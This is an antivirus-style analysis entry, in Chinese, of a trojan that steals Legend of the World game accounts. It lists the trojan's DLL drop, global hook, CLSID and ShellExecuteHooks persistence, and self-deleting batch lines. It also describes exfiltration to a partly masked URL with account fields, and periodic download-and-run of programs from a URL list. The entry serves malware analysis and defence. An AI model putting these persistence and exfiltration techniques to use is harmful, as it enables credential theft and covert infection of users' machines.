病毒名称(中文):
传奇世界盗号木马22183
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
偷密码的木马
病毒长度:
22183
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个网游盗号木马。它的目标是《传奇世界》的帐号密码信息。同时,它还会下载一些恶意程序到用户电脑中执行。
病毒流程:
1读取文件尾部104个字节
2删除文件
\FileName=C:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll
3从自身查找名为“DLLFILE”的资源,加载并释放到
C:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll
然后再把刚才得到的104个资源写入新文件SysWFGCQSJ2.dll的尾部。
4加载该DLL,GetProcaddress得到该DLL的两个导出函数jmpHookOnjmpHookOff
调用jmpHookOn,该函数的作用是下全局钩子,使所有进程加载该DLL。
5注册CLSID组件
HKCR\CLSID\{DC7035B1-E435-4A65-9546-059796785F52}\InProcServer32
"(Default)"="%ProgramFiles%\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll"
6添加启动项,随系统进程启动
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DC7035B1-E435-4A65-9546-059796785F52}
7生成bat文件删除原始程序
:try
del"D:\software\RunPE\virus.exe"
ifexist"D:\software\RunPE\virus.exe"gototry
del%0
病毒所释放的SysWFGCQSJ2.dll文件的作用
DLL被加载后
1,判定当前进程是否是桌面进程,若是跳到2.
2,移动文件MoveFileExA
0006F3E800930128|ExistingName="C:\WINDOWS\system32\VerCLSID.exe"
0006F3EC00930158|NewName="C:\WINDOWS\system32\VerCLSID.bak"
3查找窗口FindWindow,若没查找,则创建一个新线程
0006F604003F6AD4|Class="ListBox"
0006F608003F6AC8\Title="dll_wfgCQSJ"
该线程的作用是:
1查找窗口|Class="ListBox"\Title="dll_wfgCQSJ",若没找到,则创建一个新窗口
2加载DLLC:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll
3查找窗口/Title="ZXY_wfgCQSJ"|Class="ListBox",判定该窗口是否存在,若存在则发送WM_QUITE消息
4SetWindowsHookExA设置WH_GETMESSAGE钩子,钩子回调函数的作用是:
获取用户传奇世界账号并以一下形式发送到网络
http://ftp.y***9.com/px/login.aspgameid=&password=&quyu=&mirserver=&js1=
&js1zy=&js1dj=&js1sex=
&js2=&js2zy=&js2dj=&js2sex=&zb=<<传奇世界>>附加信息
5设置计时器,计时器回调函数的作用是,从网上下载恶意程序并执行。
恶意网址列表http://www.6***11.cn/txt/url.txt